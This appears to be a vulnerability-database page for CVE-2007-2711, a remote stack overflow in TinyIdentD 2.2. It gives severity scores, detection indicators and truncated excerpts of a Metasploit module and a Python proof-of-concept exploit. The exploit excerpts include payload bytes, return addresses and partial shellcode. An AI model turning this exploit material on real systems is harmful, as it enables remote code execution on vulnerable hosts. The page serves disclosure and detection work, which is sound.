CVE-2007-2711
published 2007-05-16CVE-2007-2711: Stack-based buffer overflow in TinyIdentD 2.2 and earlier allows remote attackers to execute arbitrary code via a long string to TCP port 113.
PriorityP263critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
62.71%
99.1th percentile
Stack-based buffer overflow in TinyIdentD 2.2 and earlier allows remote attackers to execute arbitrary code via a long string to TCP port 113.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tinyirc | tinyidentd | <= 2.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x20 followed by ', 28 : USERID : UNIX :'
bytes↗
\xeb\x20\x2c\x20\x32\x38\x20\x3a\x20\x55\x53\x45\x52\x49\x44\x20\x3a\x20\x55\x4e\x49\x58\x20\x3a\x20
bytes↗
\x77\x13\x83\x7c (jmp *%esi, XP kernel32.dll)
bytes↗
\xb1\x63\xd9\x77 (jmp *%esi, W2K rpcrt4.dll)
- →Detect exploit attempts by monitoring TCP port 113 (ident) for inbound connections containing the byte sequence 0xEB 0x20 followed by the ASCII string ', 28 : USERID : UNIX :' — this is the fixed exploit header present in both public PoC and Metasploit module. ↗
- →Alert on ident (TCP/113) requests exceeding ~523 bytes; the exploit constructs a payload of exactly 523 bytes including NOP sled and shellcode to trigger the stack buffer overflow. ↗
- →Flag payload space of 400 bytes with bad chars \x00\x0d\x20\x0a on TCP/113 as consistent with Metasploit module exploitation of this CVE. ↗
- →Presence of return address 0x7c2d15e7 or 0x77f46eda packed little-endian within a TCP/113 request body is a strong indicator of targeted exploitation of CVE-2007-2711. ↗
- ·The Metasploit return addresses (0x7c2d15e7 for Win2k SP4 EN, 0x77f46eda for WinXP SP2 IT) are OS/SP/language-specific; attackers targeting other platforms will use different addresses, so absence of these exact values does not rule out exploitation. ↗
- ·The standalone PoC uses a different return address (0x7c831377 from XP kernel32.dll) than the Metasploit module; both target 'jmp *%esi' / 'call esi' gadgets but from different modules. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TinyIdentD 2.2 - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2007-2711 TinyIdentD 2.2 - Remote Stack Buffer Overflow (Metasploit)
TinyIdentD 2.2 - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: tiny_identd_overflow.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TinyIdentD 2.2 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
If we send a long string to the ident service we can overwrite the return
address and execute arbitrary code. Credit to Maarten Boone.
},
'Author' => 'Jacopo Cervini ',
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE'
Exploit-DB
TinyIdentD 2.2 - Remote Buffer Overflow
exploitdb·2007-05-14
CVE-2007-2711 TinyIdentD 2.2 - Remote Buffer Overflow
TinyIdentD 2.2 - Remote Buffer Overflow
---
#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
import socket,sys
#jmp into nop sled
payload = '\xeb\x20'
#ident crap
payload += ', 28 : USERID : UNIX : '
#nop sled
payload +='XXXX'
# jmp *%esi
payload += '\x77\x13\x83\x7c' #XP kernel32.dll
#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
#metasploit alphanumeric shellcode calc.exe
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44"
shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42"
shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b"
shellcode += "\x58\x51\x54
Metasploit
TinyIdentD 2.2 Stack Buffer Overflow
metasploit
TinyIdentD 2.2 Stack Buffer Overflow
TinyIdentD 2.2 Stack Buffer Overflow
This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
No writeups or analysis indexed.
http://osvdb.org/36053http://secunia.com/advisories/25248http://www.securityfocus.com/bid/23981http://www.vupen.com/english/advisories/2007/1825https://exchange.xforce.ibmcloud.com/vulnerabilities/34298https://www.exploit-db.com/exploits/3925http://osvdb.org/36053http://secunia.com/advisories/25248http://www.securityfocus.com/bid/23981http://www.vupen.com/english/advisories/2007/1825https://exchange.xforce.ibmcloud.com/vulnerabilities/34298https://www.exploit-db.com/exploits/3925
2007-05-16
Published